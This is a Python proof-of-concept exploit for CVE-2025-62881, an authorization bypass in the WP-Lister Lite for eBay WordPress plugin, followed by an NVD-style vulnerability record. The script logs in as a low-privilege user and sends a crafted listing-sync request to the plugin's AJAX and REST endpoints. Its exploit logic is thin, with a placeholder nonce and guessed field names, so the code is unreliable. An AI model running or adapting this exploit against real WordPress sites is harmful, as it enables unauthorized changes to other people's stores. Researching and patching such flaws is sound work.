CVE-2025-62881

# CVE-2025-62881 PoC - WP-Lister Lite for eBay Authorization Bypass # Requires low-privilege WordPress account import requests import sys from bs4 import BeautifulSoup TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_nonce_and_cookie(): """Get login nonce and authentication cookies""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" # Fetch login page to get nonce resp = session.get(login_url) soup = BeautifulSoup(resp.text, 'html.parser') nonce = soup.find('input', {'name': 'wp-nonce'}) or \ soup.find('input', {'id': '_wpnonce'}) return session, nonce.get('value') if nonce else None def authenticate(session, nonce): """Authenticate with low-privilege account""" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-nonce': nonce, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post( f"{TARGET_URL}/wp-login.php", data=login_data, allow_redirects=True ) return 'wordpress_logged_in' in str(session.cookies) def exploit_auth_bypass(session): """Exploit missing authorization vulnerability""" # Example: Unauthorized product listing sync exploit_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/wp-lister/v1/listings/sync" ] headers = { 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest' } # Construct malicious request with low-privilege token exploit_payload = { 'action': 'wplister_sync_listings', 'security': 'low_privilege_nonce', # Invalid or low-level nonce 'listing_ids': 'all', 'force': True } for endpoint in exploit_endpoints: try: resp = session.post(endpoint, data=exploit_payload, headers=headers) if resp.status_code == 200: print(f"[!] Potential unauthorized action at: {endpoint}") print(f"Response: {resp.text[:200]}") except Exception as e: print(f"Error: {e}") def main(): print("[*] CVE-2025-62881 PoC - WP-Lister Lite Authorization Bypass") print("[*] Target: WP-Lister Lite for eBay <= 3.8.3\n") session, nonce = get_nonce_and_cookie() if not nonce: print("[-] Failed to obtain nonce") sys.exit(1) print("[+] Obtained nonce") if authenticate(session, nonce): print("[+] Successfully authenticated as low-privilege user") exploit_auth_bypass(session) else: print("[-] Authentication failed") sys.exit(1) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-62881", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:46.787", "lastModified": "2026-04-27T17:16:33.897", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Lab WP-Lister Lite for eBay wp-lister-for-ebay allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-Lister Lite for eBay: from n/a through <= 3.8.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-lister-for-ebay/vulnerability/wordpress-wp-lister-lite-for-ebay-plugin-3-8-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}